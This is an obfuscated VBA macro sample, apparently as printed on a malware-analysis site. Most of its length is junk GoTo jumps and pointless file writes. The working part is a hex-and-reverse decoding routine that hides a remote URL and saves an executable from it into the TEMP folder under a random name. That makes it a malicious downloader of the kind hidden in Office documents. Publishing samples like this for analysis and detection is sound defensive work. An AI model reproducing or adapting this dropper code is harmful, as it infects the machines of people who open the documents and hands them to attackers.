znyzccirnmmhvmxxtlhkxhuqhhbyerisfmoohsosfwysinhr:
Set WQTQGAKEBGH = Nothing
GoTo mfdblsyasdkumqldmlnmthdtailymcyopcjuamsvqulpgjff
Dim gmunzqdlbbcufuxuqkmipfftrovjuakxzkqjukmdtrbcvhto As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6763776663686B73656273766C77666E66637A717672696F77706B766873737561727678716A76646F77756A666B666D")) For Binary As #39664
Put #39664, , gmunzqdlbbcufuxuqkmipfftrovjuakxzkqjukmdtrbcvhto
Close #39664
mfdblsyasdkumqldmlnmthdtailymcyopcjuamsvqulpgjff:
GoTo rgpwvrrsavdkelprnmeyepbebspipuyssjanxnweexnawadl
Dim xrqsooqveeqdmfwxaszunwcqbxxwtnuwqwilnvvxmrsybwuj As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7A6A707777617A6176737A6270756E78676E76646A726F716C63766E696B6E6B69726F6E636865656963637A78657169")) For Binary As #54561
Put #54561, , xrqsooqveeqdmfwxaszunwcqbxxwtnuwqwilnvvxmrsybwuj
Close #54561
rgpwvrrsavdkelprnmeyepbebspipuyssjanxnweexnawadl:
GoTo unxmprovrhopbqarieqvsezbviwrzwjihqtonxwojkkqytan
Dim mbmsiykwartcofhlbuzdwzqjjubpbzhroeodklckndibkcth As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7061647172617467646B7270716F7A71656B6E68726A676E637565636B727A6670636A76796272657177777675757667")) For Binary As #21240
Put #21240, , mbmsiykwartcofhlbuzdwzqjjubpbzhroeodklckndibkcth
Close #21240
unxmprovrhopbqarieqvsezbviwrzwjihqtonxwojkkqytan:
End Function
Sub TFCVDJEJBJJ()
OJFXJUFZDBX StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6578652E312F736567616D692F72612E6D6F632E617372616C67756A2E7777772F2F3A70747468")), Environ("TEMP") & "\VGOMMYAIMDT.exe"
End Sub
Public Function aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw(ByVal dfgbnbui8ygbo As String) As String
Dim jhgfdbdf34gv As Long
For jhgfdbdf34gv = 1 To Len(dfgbnbui8ygbo) Step 2
aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw = aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw & Chr$(Val("&H" & Mid$(dfgbnbui8ygbo, jhgfdbdf34gv, 2)))
Next jhgfdbdf34gv
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.